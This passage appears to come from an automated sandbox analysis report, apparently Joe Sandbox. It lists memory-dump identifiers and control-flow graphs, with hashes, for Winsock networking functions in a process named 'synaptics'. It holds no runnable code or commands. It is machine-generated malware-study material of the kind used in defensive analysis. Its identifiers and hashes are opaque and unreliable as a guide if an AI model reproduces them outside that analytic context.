                                                                                                                                                                                                                                    • Associated: 00000014.00000002.2120918855.000000006C83A000.00000020.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000014.00000002.2120918855.000000006C83C000.00000020.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000014.00000002.2120918855.000000006C83E000.00000020.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000014.00000002.2120918855.000000006C841000.00000020.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000014.00000002.2120918855.000000006C843000.00000020.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000014.00000002.2120918855.000000006C854000.00000020.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000014.00000002.2120918855.000000006C856000.00000020.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000014.00000002.2120918855.000000006C858000.00000020.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000014.00000002.2120918855.000000006C85A000.00000020.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000014.00000002.2138037679.000000006C865000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000014.00000002.2138037679.000000006C867000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000014.00000002.2138037679.000000006C869000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000014.00000002.2138037679.000000006C86B000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000014.00000002.2138037679.000000006C874000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000014.00000002.2138037679.000000006C876000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000014.00000002.2138037679.000000006C878000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000014.00000002.2138037679.000000006C87A000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000014.00000002.2138037679.000000006C87C000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000014.00000002.2138037679.000000006C87E000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000014.00000002.2138037679.000000006C880000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000014.00000002.2138037679.000000006C882000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000014.00000002.2138037679.000000006C884000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000014.00000002.2138037679.000000006C886000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000014.00000002.2138037679.000000006C893000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000014.00000002.2138037679.000000006C898000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000014.00000002.2138037679.000000006C89A000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000014.00000002.2138037679.000000006C89C000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000014.00000002.2138037679.000000006C89E000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000014.00000002.2138037679.000000006C8A0000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000014.00000002.2138037679.000000006C8A2000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000014.00000002.2138037679.000000006C8A4000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000014.00000002.2138037679.000000006C8A6000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000014.00000002.2138037679.000000006C8A8000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000014.00000002.2138037679.000000006C8AA000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000014.00000002.2138037679.000000006C8AC000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000014.00000002.2138037679.000000006C8AE000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000014.00000002.2138037679.000000006C8B1000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000014.00000002.2138037679.000000006C8B6000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000014.00000002.2138037679.000000006C8C7000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000014.00000002.2138037679.000000006C8C9000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000014.00000002.2138037679.000000006C8CB000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000014.00000002.2138037679.000000006C8CD000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000014.00000002.2138037679.000000006C8D0000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000014.00000002.2138037679.000000006C8E1000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000014.00000002.2138037679.000000006C8E3000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000014.00000002.2138037679.000000006C8E5000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000014.00000002.2138037679.000000006C8E7000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000014.00000002.2138037679.000000006C8E9000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000014.00000002.2138037679.000000006C8EB000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000014.00000002.2138037679.000000006C8ED000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000014.00000002.2138037679.000000006C8EF000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000014.00000002.2144935941.000000006C8F7000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000014.00000002.2145111565.000000006C8FD000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000014.00000002.2145111565.000000006C900000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000014.00000002.2145111565.000000006C903000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000014.00000002.2145111565.000000006C905000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000014.00000002.2145111565.000000006C907000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000014.00000002.2145111565.000000006C909000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000014.00000002.2145111565.000000006C90B000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000014.00000002.2145111565.000000006C90D000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_20_2_6c6e0000_synaptics.jbxd
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID: ErrorLastsend
                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                    • API String ID: 1802528911-0
                                                                                                                                                                                                                                    • Opcode ID: 22a1028236b21be0ae7446bef3afecbb1ac503d1d693a9adc23a62879ee1b1f6
                                                                                                                                                                                                                                    • Instruction ID: 3bd6a713f5a0c628aadad2a5452f17b02d4278732cb71a320855512807dd8e31
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 22a1028236b21be0ae7446bef3afecbb1ac503d1d693a9adc23a62879ee1b1f6
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: B5E0E573B0921077DB211A556D05F8BBA64AFA7B46F040036FB0492BA1D331E41993E6

                                                                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                                                                    • Executed
                                                                                                                                                                                                                                    • Not Executed
                                                                                                                                                                                                                                    control_flow_graph 297 73fc5210-73fc52a2 299 73fc52a8-73fc52b2 297->299 300 73fc55c0-73fc55d3 call 73fc6826 297->300 301 73fc52be-73fc52c9 299->301 302 73fc52b4-73fc52bc 299->302 305 73fc52ef-73fc52f4 301->305 306 73fc52cb-73fc52e4 301->306 304 73fc530c-73fc5323 302->304 310 73fc5368-73fc5370 304->310 311 73fc5325-73fc5334 304->311 308 73fc52fa-73fc5301 305->308 309 73fc55ab-73fc55bd 305->309 306->300 316 73fc52ea-73fc52ed 306->316 325 73fc5304-73fc5308 308->325 309->300 313 73fc5390-73fc5395 310->313 314 73fc5372-73fc5380 310->314 323 73fc5344-73fc5366 311->323 324 73fc5336-73fc533e 311->324 319 73fc539c-73fc53a2 313->319 320 73fc5397-73fc539a 313->320 328 73fc5575-73fc557b 314->328 329 73fc5386-73fc538e 314->329 316->325 321 73fc53a8 319->321 322 73fc5560-73fc5572 319->322 327 73fc53aa-73fc53cd 320->327 321->327 322->328 323->327 324->323 324->328 325->304 327->300 337 73fc53d3-73fc5420 getaddrinfo 327->337 334 73fc557d-73fc5580 328->334 335 73fc5588-73fc558e 328->335 329->327 334->335 338 73fc5582-73fc5585 334->338 335->300 336 73fc5590-73fc55aa call 73fc6826 335->336 344 73fc5428-73fc542d 337->344 338->335 345 73fc542f-73fc543e call 73fc10c0 344->345 346 73fc5443-73fc5456 344->346 345->328 346->328 350 73fc545c-73fc5462 346->350 351 73fc5468-73fc547b 350->351 352 73fc550b-73fc5511 350->352 353 73fc5480-73fc5496 call 73fc19c0 351->353 354 73fc551e-73fc5524 352->354 355 73fc5513-73fc5516 352->355 362 73fc549c-73fc54c3 353->362 363 73fc554b-73fc5556 353->363 358 73fc552d-73fc5540 call 73fc6826 354->358 359 73fc5526 354->359 355->354 357 73fc5518-73fc551b 355->357 357->354 359->358 368 73fc54c5-73fc54cf 362->368 369 73fc54d1 362->369 363->328 366 73fc5558-73fc555e 363->366 366->328 371 73fc54d5-73fc54d7 368->371 369->371 371->363 373 73fc54d9-73fc54ec 371->373 375 73fc54ee-73fc54f0 373->375 376 73fc5541-73fc5543 373->376 377 73fc54f8-73fc5501 375->377 378 73fc54f2-73fc54f5 375->378 376->363 379 73fc5545-73fc5548 376->379 377->353 380 73fc5507 377->380 378->377 379->363 380->352
                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                    • getaddrinfo.WS2_32(?,00000000,?,?), ref: 73FC5419
                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 00000014.00000002.2203187848.0000000073FC1000.00000020.00000001.01000000.00000009.sdmp, Offset: 73FC1000, based on PE: false
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_20_2_73fc1000_synaptics.jbxd
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID: getaddrinfo
                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                    • API String ID: 300660673-0
                                                                                                                                                                                                                                    • Opcode ID: 09bd3143f5b0b648c805a7d639927d4e3ac9dc7573a9cef05a2a88c848bb428c
                                                                                                                                                                                                                                    • Instruction ID: b5294c8e1a6f408ed2353bdc7bf8246e16a1ce26dfcabf5dda584eadd8e66530
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 09bd3143f5b0b648c805a7d639927d4e3ac9dc7573a9cef05a2a88c848bb428c
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: A5B18CB2684382DFC700DF26C844B6BB7F6EF88294F144A1DF89A97291D735E905CB52

                                                                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                                                                    • Executed
                                                                                                                                                                                                                                    • Not Executed
                                                                                                                                                                                                                                    control_flow_graph 383 73fc2810-73fc2833 connect 385 73fc283b-73fc2840 383->385 386 73fc2a6c-73fc2a74 385->386 387 73fc2846-73fc285a 385->387 390 73fc285c-73fc2864 387->390 391 73fc28a9-73fc28b7 387->391 400 73fc295e-73fc2967 390->400 401 73fc286a-73fc287a 390->401 392 73fc2889-73fc288d 391->392 393 73fc28b9 391->393 397 73fc2a63-73fc2a6b 392->397 398 73fc2893-73fc28a8 392->398 394 73fc28bf-73fc28c5 393->394 395 73fc28bb-73fc28bd 393->395 394->392 399 73fc28c7-73fc28cb 394->399 395->392 395->394 403 73fc2a3e-73fc2a5e call 73fc1280 399->403 404 73fc28d1-73fc28d6 399->404 405 73fc287c-73fc2881 401->405 406 73fc2883 401->406 403->386 416 73fc2a60 403->416 408 73fc28d8 404->408 409 73fc28e7 404->409 410 73fc2885-73fc2887 405->410 406->410 413 73fc28de-73fc28e5 408->413 414 73fc28da-73fc28dc 408->414 415 73fc28ee-73fc2904 409->415 410->392 410->399 413->415 414->409 414->413 417 73fc2907-73fc290b 415->417 416->397 418 73fc290d-73fc290f 417->418 419 73fc2968-73fc296a 417->419 420 73fc2911-73fc2921 418->420 421 73fc2923-73fc293c 418->421 422 73fc296c-73fc2982 call 73fc1170 419->422 429 73fc293f-73fc2941 420->429 421->429 427 73fc2984-73fc298b 422->427 428 73fc29a6-73fc29a9 422->428 436 73fc2a2f-73fc2a3d 427->436 437 73fc2991-73fc2999 427->437 430 73fc2949-73fc295b 428->430 432 73fc29ab 428->432 429->430 431 73fc2943 429->431 430->400 431->422 434 73fc2945-73fc2947 431->434 435 73fc29b0-73fc29ce call 73fc27b0 432->435 434->422 434->430 435->386 446 73fc29d4-73fc29e1 435->446 437->400 443 73fc299b-73fc29a1 437->443 443->417 448 73fc29f7-73fc29fb 446->448 449 73fc29e3-73fc29eb 446->449 448->436 450 73fc29fd 448->450 449->435 454 73fc29ed-73fc29f6 449->454 452 73fc29ff-73fc2a03 450->452 453 73fc2a05-73fc2a15 450->453 452->436 452->453 453->417 456 73fc2a1b-73fc2a22 453->456 456->436 458 73fc2a24-73fc2a2a 456->458 458->417
                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 00000014.00000002.2203187848.0000000073FC1000.00000020.00000001.01000000.00000009.sdmp, Offset: 73FC1000, based on PE: false
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_20_2_73fc1000_synaptics.jbxd
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID: connect
                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                    • API String ID: 1959786783-0
                                                                                                                                                                                                                                    • Opcode ID: 298e8bb2dbc3358b5ca02462cf7ab676f3a232062ee69cb81c3c2610ecde8663
                                                                                                                                                                                                                                    • Instruction ID: 41ff3558a6b7caaa90ad1a3c3cad9b5508d79663a32fd898033670ba5b1dfbcf
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 298e8bb2dbc3358b5ca02462cf7ab676f3a232062ee69cb81c3c2610ecde8663
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 53717032A8024FEBDF159B69DD547ADB7F5FF843A1F244266E81AE32C0D731C9409A90

                                                                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                                                                    • Executed
                                                                                                                                                                                                                                    • Not Executed
                                                                                                                                                                                                                                    control_flow_graph 459 73fc3e4a-73fc3e61 460 73fc3f56-73fc3f65 459->460 461 73fc3e67-73fc3e6e 459->461 467 73fc3f9e-73fc3fcd call 73fc746e getsockname 460->467 468 73fc3f67-73fc3f6f 460->468 462 73fc3e70-73fc3ea1 call 73fc6826 461->462 463 73fc3ea2-73fc3eda 461->463 471 73fc3f86-73fc3f9d call 73fc6826 463->471 472 73fc3ee0-73fc3f11 463->472 480 73fc3fcf-73fc3fd4 467->480 481 73fc3fe1-73fc3fe6 467->481 468->471 478 73fc3f71-73fc3f83 468->478 485 73fc3f13-73fc3f2f call 73fc1090 call 73fc6826 472->485 497 73fc3f30-73fc3f51 472->497 478->471 482 73fc3ffd-73fc4004 480->482 483 73fc3fd6-73fc3fdf 480->483 484 73fc3fec-73fc3ff7 481->484 481->485 490 73fc4039-73fc403f 482->490 491 73fc4006-73fc402b 482->491 483->482 484->482 484->485 496 73fc416a-73fc4194 490->496 491->485 503 73fc4031-73fc4035 491->503 500 73fc41ce-73fc41e4 call 73fc6826 496->500 501 73fc4196 496->501 497->496 504 73fc419c-73fc41c7 501->504 505 73fc4198-73fc419a 501->505 503->490 509 73fc41c9-73fc41cb 504->509 510 73fc41e5-73fc421f call 73fc6826 504->510 505->500 505->504 509->500
                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 00000014.00000002.2203187848.0000000073FC1000.00000020.00000001.01000000.00000009.sdmp, Offset: 73FC1000, based on PE: false
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_20_2_73fc1000_synaptics.jbxd
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                                    • Opcode ID: bee25c57ea43f61e545fecc7a80b85f7d661b8d2e62089a8a53448838aa497bf
                                                                                                                                                                                                                                    • Instruction ID: 981ba61246e68a3969fc53b79dba59e65152eaa0418cd3ff83ff28527e3abffd
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: bee25c57ea43f61e545fecc7a80b85f7d661b8d2e62089a8a53448838aa497bf
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 8271D472588342DFC711DF65D85479B7BE9BF843A4F104A2AF9AA872D0EB35C404CB92

                                                                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                                                                    • Executed
                                                                                                                                                                                                                                    • Not Executed
                                                                                                                                                                                                                                    control_flow_graph 518 73fc407e-73fc407f 519 73fc4004 518->519 520 73fc4081-73fc40ad WSASocketW 518->520 521 73fc4039-73fc403f 519->521 522 73fc4006-73fc402b 519->522 523 73fc40cd-73fc40d9 520->523 524 73fc40af-73fc40cb 520->524 525 73fc416a-73fc4194 521->525 534 73fc4031-73fc4035 522->534 535 73fc3f13-73fc3f2f call 73fc1090 call 73fc6826 522->535 531 73fc40db-73fc40e3 523->531 532 73fc4120-73fc4127 523->532 524->523 528 73fc41ce-73fc41e4 call 73fc6826 525->528 529 73fc4196 525->529 536 73fc419c-73fc41c7 529->536 537 73fc4198-73fc419a 529->537 546 73fc40f8-73fc411f call 73fc6826 531->546 547 73fc40e5-73fc40f3 531->547 538 73fc4129-73fc4136 532->538 539 73fc4162-73fc4166 532->539 534->521 552 73fc41c9-73fc41cb 536->552 553 73fc41e5-73fc421f call 73fc6826 536->553 537->528 537->536 538->539 550 73fc4138-73fc4161 call 73fc6826 538->550 539->525 547->546 552->528
                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                    • WSASocketW.WS2_32(?,?,?,00000000), ref: 73FC40A2
                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 00000014.00000002.2203187848.0000000073FC1000.00000020.00000001.01000000.00000009.sdmp, Offset: 73FC1000, based on PE: false
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_20_2_73fc1000_synaptics.jbxd
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID: Socket
                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                    • API String ID: 38366605-0
                                                                                                                                                                                                                                    • Opcode ID: 0d6806c177b13af3ffd83338516d9cab4f96513747ddbeb867ce06028b2ecd74
                                                                                                                                                                                                                                    • Instruction ID: 575130cd1446c4023ea7a56fec0f46f0a0033fa26a4c396f1f09a7a234f62a1f
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 0d6806c177b13af3ffd83338516d9cab4f96513747ddbeb867ce06028b2ecd74
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: DF41B272584342CFD702EF26D95475A7BE6FF883A5F10062AF94B87290DB31C404CB92

                                                                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                                                                    • Executed
                                                                                                                                                                                                                                    • Not Executed
                                                                                                                                                                                                                                    control_flow_graph 569 73fc2440-73fc246a 571 73fc246c-73fc2486 setsockopt 569->571 572 73fc248b-73fc24b6 569->572 573 73fc2521-73fc2523 571->573 579 73fc24b8-73fc24d1 572->579 580 73fc24d3-73fc24f2 572->580 575 73fc2525-73fc252f 573->575 576 73fc2530-73fc253c 573->576 579->573 584 73fc24fa-73fc251e 580->584 585 73fc24f4-73fc24f9 580->585 584->573
                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                    • setsockopt.WS2_32(?,?,?,?,00000004), ref: 73FC247E
                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 00000014.00000002.2203187848.0000000073FC1000.00000020.00000001.01000000.00000009.sdmp, Offset: 73FC1000, based on PE: false
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_20_2_73fc1000_synaptics.jbxd
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID: setsockopt
                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                    • API String ID: 3981526788-0
                                                                                                                                                                                                                                    • Opcode ID: 4b48c04fbd02fbeb8410d87762cf29f9bb02888154b0d7c6c857907d577ba8ed
                                                                                                                                                                                                                                    • Instruction ID: fd5a133b274930b45c3dafcdc66bba9cd44b8ffc528625982af5f79d83a927d6
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 4b48c04fbd02fbeb8410d87762cf29f9bb02888154b0d7c6c857907d577ba8ed
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: DC31197794011EFFCF019BD5CC00EDEBBBDEB48250F1501A2EA1AA3111D731EA559BA1

                                                                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                                                                    • Executed
                                                                                                                                                                                                                                    • Not Executed
                                                                                                                                                                                                                                    control_flow_graph 606 73fc1100-73fc1132 ioctlsocket 608 73fc1134-73fc1145 606->608 609 73fc1146-73fc116f 606->609
                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                    • ioctlsocket.WS2_32(?,8004667E,?), ref: 73FC1129
                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 00000014.00000002.2203187848.0000000073FC1000.00000020.00000001.01000000.00000009.sdmp, Offset: 73FC1000, based on PE: false
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_20_2_73fc1000_synaptics.jbxd
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID: ioctlsocket
                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                    • API String ID: 3577187118-0
                                                                                                                                                                                                                                    • Opcode ID: 3cc9698951d40b177c599706352eb29c254e577d91c60bf9add66635fac3eb3a
                                                                                                                                                                                                                                    • Instruction ID: cda3564201235064d73344896a0589878fe1c3c3618b56ff317fd99affbde12a
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 3cc9698951d40b177c599706352eb29c254e577d91c60bf9add66635fac3eb3a
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: BFF0C833640505AFC700ABABDC5D597BBECEF442A67204272F90EC3210EB319D2487A1

                                                                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                                                                    • Executed
                                                                                                                                                                                                                                    • Not Executed
                                                                                                                                                                                                                                    control_flow_graph 614 73fc2730-73fc273e 615 73fc277b-73fc2785 614->615 616 73fc2740-73fc2758 closesocket 614->616 618 73fc2760-73fc2766 616->618 618->615 619 73fc2768-73fc2771 618->619 619->615 621 73fc2773-73fc2778 619->621 621->615
                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 00000014.00000002.2203187848.0000000073FC1000.00000020.00000001.01000000.00000009.sdmp, Offset: 73FC1000, based on PE: false
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_20_2_73fc1000_synaptics.jbxd
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID: closesocket
                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                    • API String ID: 2781271927-0
                                                                                                                                                                                                                                    • Opcode ID: c58b40040f5563015cc03836408e0af272e930d6792ae718b012e12aff5442e0
                                                                                                                                                                                                                                    • Instruction ID: 5c95bce9d85caf8dd33d9db2422f7e0d37a2b237752a9b6fc184b23f7ac50437
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: c58b40040f5563015cc03836408e0af272e930d6792ae718b012e12aff5442e0
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 31F05433180505DBC7016F6AD8D8A9577BDEE897B23290252E91FC71D1D731D842CBB0

                                                                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                                                                    • Executed
                                                                                                                                                                                                                                    • Not Executed
                                                                                                                                                                                                                                    control_flow_graph 622 6c819f90-6c819fa2 TlsFree
                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 00000014.00000002.2120918855.000000006C812000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6C6E0000, based on PE: true
                                                                                                                                                                                                                                    • Associated: 00000014.00000002.2120807504.000000006C6E0000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000014.00000002.2120918855.000000006C6ED000.00000020.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000014.00000002.2120918855.000000006C6F1000.00000020.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000014.00000002.2120918855.000000006C6F3000.00000020.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000014.00000002.2120918855.000000006C6F5000.00000020.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000014.00000002.2120918855.000000006C6F7000.00000020.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000014.00000002.2120918855.000000006C6F9000.00000020.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000014.00000002.2120918855.000000006C6FC000.00000020.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000014.00000002.2120918855.000000006C6FE000.00000020.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000014.00000002.2120918855.000000006C70F000.00000020.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000014.00000002.2120918855.000000006C720000.00000020.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000014.00000002.2120918855.000000006C724000.00000020.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000014.00000002.2120918855.000000006C735000.00000020.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000014.00000002.2120918855.000000006C737000.00000020.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000014.00000002.2120918855.000000006C73C000.00000020.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000014.00000002.2120918855.000000006C73E000.00000020.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000014.00000002.2120918855.000000006C740000.00000020.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000014.00000002.2120918855.000000006C742000.00000020.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000014.00000002.2120918855.000000006C744000.00000020.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000014.00000002.2120918855.000000006C749000.00000020.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000014.00000002.2120918855.000000006C74B000.00000020.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000014.00000002.2120918855.000000006C75C000.00000020.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000014.00000002.2120918855.000000006C75E000.00000020.00000001.01000000.0000000D.sdmpDownload File
